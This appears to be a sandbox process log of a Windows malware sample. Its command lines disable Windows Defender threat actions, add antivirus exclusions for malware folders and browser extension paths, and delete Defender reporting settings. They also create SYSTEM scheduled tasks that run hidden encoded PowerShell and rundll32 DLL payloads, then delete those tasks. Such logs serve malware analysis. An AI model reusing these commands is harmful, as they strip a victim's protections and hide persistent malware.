C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:1376
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JSvmmaasyifU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JSvmmaasyifU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PsYvahnKTrUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PsYvahnKTrUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XAdqrgEBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XAdqrgEBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fQVUHuJykzJROXvopbR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fQVUHuJykzJROXvopbR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mTRodfBIfZXIC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mTRodfBIfZXIC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOobGsbFvZLKVmVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOobGsbFvZLKVmVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\FCpAHwyRaDjRyPMK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\FCpAHwyRaDjRyPMK\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:1948
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5940
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JSvmmaasyifU2" /t REG_DWORD /d 0 /reg:323⤵PID:5492
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JSvmmaasyifU2" /t REG_DWORD /d 0 /reg:324⤵PID:1856
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JSvmmaasyifU2" /t REG_DWORD /d 0 /reg:643⤵PID:4280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PsYvahnKTrUn" /t REG_DWORD /d 0 /reg:323⤵PID:5564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PsYvahnKTrUn" /t REG_DWORD /d 0 /reg:643⤵PID:2520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XAdqrgEBU" /t REG_DWORD /d 0 /reg:323⤵PID:1892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XAdqrgEBU" /t REG_DWORD /d 0 /reg:643⤵PID:5364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fQVUHuJykzJROXvopbR" /t REG_DWORD /d 0 /reg:323⤵PID:3640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fQVUHuJykzJROXvopbR" /t REG_DWORD /d 0 /reg:643⤵PID:5848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mTRodfBIfZXIC" /t REG_DWORD /d 0 /reg:323⤵PID:3568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mTRodfBIfZXIC" /t REG_DWORD /d 0 /reg:643⤵PID:5168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOobGsbFvZLKVmVB /t REG_DWORD /d 0 /reg:323⤵PID:2896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOobGsbFvZLKVmVB /t REG_DWORD /d 0 /reg:643⤵PID:392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ /t REG_DWORD /d 0 /reg:323⤵PID:2564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ /t REG_DWORD /d 0 /reg:643⤵PID:1404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\FCpAHwyRaDjRyPMK /t REG_DWORD /d 0 /reg:323⤵PID:4356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\FCpAHwyRaDjRyPMK /t REG_DWORD /d 0 /reg:643⤵PID:3048
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfOdTJxhb" /SC once /ST 02:24:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:5332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfOdTJxhb"2⤵PID:6092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfOdTJxhb"2⤵PID:1880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nEIDyORqfotFHrFjj" /SC once /ST 03:10:36 /RU "SYSTEM" /TR "\"C:\Windows\Temp\FCpAHwyRaDjRyPMK\KNuunPWBMPugBor\aIEJDMP.exe\" fB /bJsite_idfEi 525403 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:5960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "nEIDyORqfotFHrFjj"2⤵PID:2436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5080 -ip 50801⤵PID:5796
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:2696
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:6052
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5136 -ip 51361⤵PID:6096
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5800 -ip 58001⤵PID:5608
-
C:\Windows\Temp\FCpAHwyRaDjRyPMK\KNuunPWBMPugBor\aIEJDMP.exeC:\Windows\Temp\FCpAHwyRaDjRyPMK\KNuunPWBMPugBor\aIEJDMP.exe fB /bJsite_idfEi 525403 /S1⤵PID:5148
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct2⤵PID:5852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bVVEtlzJxMROejURst"2⤵PID:5284
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4636
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:5788
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:5416
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\XAdqrgEBU\bXmqkF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "IiMEJPNSvkLCmYT" /V1 /F2⤵
- Creates scheduled task(s)
PID:2976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IiMEJPNSvkLCmYT2" /F /xml "C:\Program Files (x86)\XAdqrgEBU\gHDHQXf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "IiMEJPNSvkLCmYT"2⤵PID:5540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "IiMEJPNSvkLCmYT"2⤵PID:1376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EBDqAzlINIanDN" /F /xml "C:\Program Files (x86)\JSvmmaasyifU2\kbUQAuv.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hAtTRPFuPUtTW2" /F /xml "C:\ProgramData\uOobGsbFvZLKVmVB\dINoKah.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VtFobttFvGJIIJZcR2" /F /xml "C:\Program Files (x86)\fQVUHuJykzJROXvopbR\nsZQgMl.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HYUvCLLSkqCzkDYABLk2" /F /xml "C:\Program Files (x86)\mTRodfBIfZXIC\TVZKRyN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GDslENqmQrPagdBhX" /SC once /ST 13:52:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\FCpAHwyRaDjRyPMK\ygEQnZXI\wvHZhBU.dll\",#1 /Avsite_idsMi 525403" /V1 /F2⤵
- Creates scheduled task(s)
PID:1708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GDslENqmQrPagdBhX"2⤵PID:2844
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:6128
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:3444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:4416
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:3436
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nEIDyORqfotFHrFjj"2⤵PID:4448
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\FCpAHwyRaDjRyPMK\ygEQnZXI\wvHZhBU.dll",#1 /Avsite_idsMi 5254031⤵PID:4888
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\FCpAHwyRaDjRyPMK\ygEQnZXI\wvHZhBU.dll",#1 /Avsite_idsMi 5254032⤵PID:5204
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GDslENqmQrPagdBhX"3⤵PID:6140
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3768 -ip 37681⤵PID:6076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1644 -ip 16441⤵PID:2452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5904 -ip 59041⤵PID:2160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6036 -ip 60361⤵PID:5248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵PID:5576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5492 -ip 54921⤵PID:5364
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5848 -ip 58481⤵PID:4216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6100 -ip 61001⤵PID:6040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5452 -ip 54521⤵PID:5036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5928 -ip 59281⤵PID:5884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5580 -ip 55801⤵PID:3580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5888 -ip 58881⤵PID:2288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5480 -ip 54801⤵PID:3136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2992 -ip 29921⤵PID:2200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5848 -ip 58481⤵PID:4784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5732 -ip 57321⤵PID:3656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 3584 -ip 35841⤵PID:2220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3436 -ip 34361⤵PID:5840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 3696 -ip 36961⤵PID:4404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1328 -ip 13281⤵PID:2872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 4460 -ip 44601⤵PID:528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 4896 -ip 48961⤵PID:4296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 4500 -ip 45001⤵PID:2612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5480 -ip 54801⤵PID:5368
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵PID:3224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 1960 -ip 19601⤵PID:2472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 4076 -ip 40761⤵PID:2436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 4404 -ip 44041⤵PID:4852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5508 -ip 55081⤵PID:3520
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 4012 -ip 40121⤵PID:4460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 876 -p 2912 -ip 29121⤵PID:3444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 916 -p 5984 -ip 59841⤵PID:5288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 1884 -ip 18841⤵PID:5444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 5316 -ip 53161⤵PID:3568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 920 -p 4800 -ip 48001⤵PID:3516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 928 -p 1112 -ip 11121⤵PID:2988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 964 -p 1924 -ip 19241⤵PID:6096
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 964 -p 2872 -ip 28721⤵PID:4232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 1012 -p 3544 -ip 35441⤵PID:4704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 980 -p 3352 -ip 33521⤵PID:2984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 976 -p 3716 -ip 37161⤵PID:4020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 948 -p 4500 -ip 45001⤵PID:968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 1016 -p 1892 -ip 18921⤵PID:1884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 948 -p 5040 -ip 50401⤵PID:5896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 984 -p 544 -ip 5441⤵PID:2020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 952 -p 2220 -ip 22201⤵PID:2852
-
C:\Users\Admin\AppData\Roaming\ebhhagdC:\Users\Admin\AppData\Roaming\ebhhagd1⤵PID:4800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 1012 -p 852 -ip 8521⤵PID:5840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 988 -p 388 -ip 3881⤵PID:3552
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 1012 -p 4640 -ip 46401⤵PID:5508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 1020 -p 3232 -ip 32321⤵PID:5164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 1020 -p 3236 -ip 32361⤵PID:3208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 2236 -ip 22361⤵PID:4532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 972 -p 692 -ip 6921⤵PID:5272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 972 -p 4744 -ip 47441⤵PID:2460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 984 -p 2360 -ip 23601⤵PID:2696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 1012 -p 6016 -ip 60161⤵PID:5136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 976 -p 1528 -ip 15281⤵PID:6012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 1000 -p 4856 -ip 48561⤵PID:1712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 952 -p 4516 -ip 45161⤵PID:1560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 952 -p 444 -ip 4441⤵PID:3124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 1004 -p 2128 -ip 21281⤵PID:5564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 980 -p 4924 -ip 49241⤵PID:2012
-
